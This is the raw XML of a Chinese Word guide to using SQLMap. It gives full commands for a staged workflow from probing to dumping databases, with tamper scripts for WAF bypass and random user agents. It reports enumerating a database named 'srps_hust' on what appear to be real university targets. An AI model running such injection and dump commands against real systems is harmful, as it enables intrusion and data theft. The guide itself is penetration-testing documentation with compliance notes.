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8C5C7B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>SQLMap 使用与操作详解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09073418">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>说明：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 基于示例与命令定制，包含安装、基础用法、参数详解、分阶段渗透流程、常见问题与合规注意事项等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E33080"/>
    <w:p w14:paraId="07A25478">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>一、概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747B8075">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>SQLMap 是一个自动化的 SQL 注入检测与利用工具，支持多种注入类型、DBMS，以及脱库、列枚举、文件读取等功能。适用于渗透测试与安全评估场景。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11619C6D">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>二、安装与环境准备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D102E3C">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>1. Python 环境：建议使用 Python 3.8 及以上。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588CF359">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>2. 获取 sqlmap：可从官方 Git 仓库克隆或下载稳定发行版（例如：git clone https://github.com/sqlmapproject/sqlmap.git）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007B87D4">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>3. 依赖：sqlmap 依赖标准库，通常无需额外第三方包。Windows 用户建议在 PowerShell 或 CMD 中运行，Linux/macOS 在终端运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2DD4B3">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>4. 权限：在渗透测试前，确保有明确授权，遵守法律法规与企业合规要求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADC6904">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>三、基础用法与常见参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE75EE3">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>常见启动方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC89C37">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">示例： </w:t>
      </w:r>
      <w:r>
        <w:t>python sqlmap.py -u "http://target/vuln.php?id=1" --batch --level=2 --risk=1</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>常用参数说明：</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3843C26B">
      <w:r>
        <w:t>-u/--url: 指定目标 URL。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F245729">
      <w:r>
        <w:t>-r/--request-file: 从文件读取完整的 HTTP 请求（推荐用于复现扫描）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFAE5D2">
      <w:r>
        <w:t>-p/--param: 指定要测试的参数或参数列表（例如：-p id 或 -p id,orderBy）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4B6426">
      <w:r>
        <w:t>--batch: 非交互模式，使用默认选项回答提示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538B5DAA">
      <w:r>
        <w:t>--level: 扫描深度（1-5），值越大扫描越详尽。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A62507">
      <w:r>
        <w:t>--risk: 风险级别（1-3），影响使用的 payload 集合。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6A19E7">
      <w:r>
        <w:t>--threads: 并发线程数，加快探测（注意目标承载能力）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C3EA20">
      <w:r>
        <w:t>--dbms: 指定目标的数据库类型（mysql, postgresql, mssql, oracle 等）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4B0AC1">
      <w:r>
        <w:t>--dump: 在确认注入后导出数据库数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B39CF49">
      <w:r>
        <w:t>--batch --flush-session: 非交互并清理历史会话，常用于重复测试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705AC95C">
      <w:r>
        <w:t>--tamper: 指定 tamper 脚本，例如 space2comment,charencode,between 等，用于绕过 WAF/过滤。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07311D60">
      <w:r>
        <w:t>--random-agent: 随机 User-Agent，避免被轻易识别。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8FF568">
      <w:r>
        <w:t>--timeout / --retries: 网络超时与重试设置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332F700E">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>四、常见命令详解（逐项拆解）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12185C12">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>下面对示例命令中的关键选项逐项说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D80F40">
      <w:r>
        <w:t>示例常见选项拆解：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4688DA0C">
      <w:r>
        <w:t>1) -r &lt;file&gt;：从文件读取请求，文件中应包含完整的 HTTP 请求头与 body。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D23CC6F">
      <w:r>
        <w:t>2) -p &lt;param&gt;：指定单个或多个参数进行注入测试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410CED33">
      <w:r>
        <w:t>3) --technique：注入技术（例如 B=Boolean, T=Time-based, E=Error, U=Union, S=Stacked queries, Q=Inline query 等）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B20B2B">
      <w:r>
        <w:t>4) --tamper：tamper 脚本链（使用逗号分隔)。tamper 脚本用于对 payload 做字符替换或编码，以绕过 WAF/过滤。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386F52D5">
      <w:r>
        <w:t>5) --dump：在确认注入后导出数据库表/列/数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60726A8E">
      <w:r>
        <w:t>6) &gt; logfile 2&gt;&amp;1：将输出与错误重定向到渗透日志文件，便于事后分析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36430D7F">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>五、分阶段测试流程（示例）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DB94F7">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>建议的分阶段流程：基础探测 -&gt; 深度测试 -&gt; 确认注入并导出数据。以下示例基于命令模板进行了说明。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9B4C61">
      <w:r>
        <w:t>阶段1：基础探测</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>python sqlmap.py -r "H:\公司\安全扫描\hzau_Request.txt" -p orderBy --batch --technique=BT --tamper=space2comment --dbms=mysql --level=3 --risk=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045BF723">
      <w:r>
        <w:t>阶段2：深度测试（如果阶段1成功）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>python sqlmap.py -r "H:\公司\安全扫描\hzau_Request.txt" -p orderBy --batch --technique=BT --tamper=space2comment,charencode,between --dbms=mysql --level=5 --risk=3 --threads=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFA97BA">
      <w:r>
        <w:t>阶段3：数据提取（如果确认注入）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>python sqlmap.py -r "H:\公司\安全扫描\hzau_Request.txt" -p orderBy --batch --dump --dbms=mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1754D33F">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>六、示例命令与日志收集（示例）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1878DE16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>下列命令来自示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3E4983">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>python sqlmap.py -r "H:\公司\安全扫描\hust_user_list_Request.txt" -p ennames --batch --level=5 --risk=3 --technique=BEUSTQ --tamper=space2comment,charencode,between --flush-session --threads=5 --random-agent --timeout=20 --retries=3 --dbms=mysql --dump --output-dir="H:\公司\安全扫描\hust_user_list_sqlmap_output" &gt; "H:\公司\安全扫描\hust_user_list_渗透日志.txt" 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7929093E">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>python sqlmap.py -r "H:\公司\安全扫描\hzau_Request.txt" -p orderBy --batch --technique=BT --tamper=space2comment --dbms=mysql --level=3 --risk=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9DBE39">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>python sqlmap.py -r "H:\公司\安全扫描\hzau_Request.txt" -p orderBy --batch --technique=BT --tamper=space2comment,charencode,between --dbms=mysql --level=5 --risk=3 --threads=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A16448C">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>python sqlmap.py -r "H:\公司\安全扫描\hzau_Request.txt" -p orderBy --batch --dump --dbms=mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2115A9B5">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>对长命令逐项说明（示例）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BB5D94">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5482590" cy="1062990"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="1" name="图片 1" descr="sqlmap命令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qlmap命令示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B2669">
      <w:r>
        <w:t>python sqlmap.py -r "H:\公司\安全扫描\hust_user_list_Request.txt" -p ennames --batch --level=5 --risk=3 --technique=BEUSTQ --tamper=space2comment,charencode,between --flush-session --threads=5 --random-agent --timeout=20 --retries=3 --dbms=mysql --dump --output-dir="H:\公司\安全扫描\hust_user_list_sqlmap_output" &gt; "H:\公司\安全扫描\hust_user_list_渗透日志.txt" 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035CAC53">
      <w:r>
        <w:t>针对上面的长命令，重点说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0432B021">
      <w:r>
        <w:t>- 使用 -r 指定请求文件，便于重现真实请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63620FDA">
      <w:r>
        <w:t>- 使用 --tamper 指定多个 tamper 脚本用于绕过 WAF。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591D5C7C">
      <w:r>
        <w:t>- 使用 --dump 并且指定 --dbms 确保导出正确的 DBMS 格式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D8981D">
      <w:r>
        <w:t>- 将输出重定向到日志文件（&gt; logfile 2&gt;&amp;1）方便分析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E79B791">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>八、常用 tamper 脚本简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7732A20C">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>常见 tamper 脚本示例及用途（部分示例）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678055DB">
      <w:r>
        <w:t>- space2comment：将空格转换为注释，常用于绕过简单的过滤器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5EEB58">
      <w:r>
        <w:t>- charencode：对 payload 进行编码转换，绕过字符检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C72176">
      <w:r>
        <w:t>- between：把 payload 包裹在 BETWEEN 或类似语法以规避检测（视脚本实现而定）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3C1D68">
      <w:r>
        <w:t>使用 tamper 时注意：tamper 会改变 payload，可能影响成功率，需在测试时逐个验证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56608584">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>九、导出数据与日志建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB56962">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>1. 使用 --output-dir 指定输出目录，sqlmap 会将会话与已识别信息保存。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15605B16">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>2. 建议将终端输出重定向到文件以保存详细渗透日志（示例：&gt; output.txt 2&gt;&amp;1）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59520F34">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>3. 对于敏感导出数据，保存时请加密或限制访问权限，防止泄露。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A9F7BB">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>十、合规与安全注意事项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D9B337">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>1. 渗透测试必须获得书面授权，未经许可的测试可能构成非法入侵。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC51527">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>2. 对生产环境执行高强度扫描前应与负责人沟通，以免影响业务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C24E7B">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>3. 对导出数据的存储与传输应采取相应安全措施（加密、权限控制）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F30925">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>十一、常见问题与排错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0413B40E">
      <w:r>
        <w:t>- 如果出现乱码或编码异常，请检查终端编码（Windows 下使用 chcp 65001），并尝试 --charset 或调整 tamper。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF39FD1">
      <w:r>
        <w:t>- 当扫描被 WAF 阻断时，降低扫描速率、使用 tamper 或采用手工分析定位 payload。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5726DB21">
      <w:r>
        <w:t>- 针对长时间网络超时场景，可调整 --timeout 与 --retries。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27046F8D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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结果示例（部分）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A51A7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86400" cy="2786380"/>
            <wp:effectExtent l="0" t="0" r="0" b="13970"/>
            <wp:docPr id="2" name="图片 2" descr="部分sqlmap探测结果示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部分sqlmap探测结果示例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8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D132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成功利用SQL注入漏洞进行了以下操作：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2098918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数据库枚举: 成功识别数据库名称为 `srps_hust`</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6F7730D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表结构枚举: 成功枚举超过50个数据表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471AE1D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 数据dump尝试: 尝试dump多个关键业务表的数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285425F3">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN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5BFE78"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CE5BFE78"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1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2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3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4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5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6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7">
    <w:nsid w:val="68371EBA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="68371EBA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7221ED4"/>
    <w:rsid w:val="3AF54813"/>
    <w:rsid w:val="68A94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1434</Words>
  <Characters>3287</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>5</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3534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KK努力上岸ing</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-03T02:53:55Z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9A53315416784EC4BA989347793867D3_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiN2JhMDRmODRmZjQ0MGFmMTFlOTMzYTdjNzFlYzI0NjkiLCJ1c2VySWQiOiI3ODgwOTkxODUifQ==</vt:lpwstr>
  </property>
</Properties>
</file>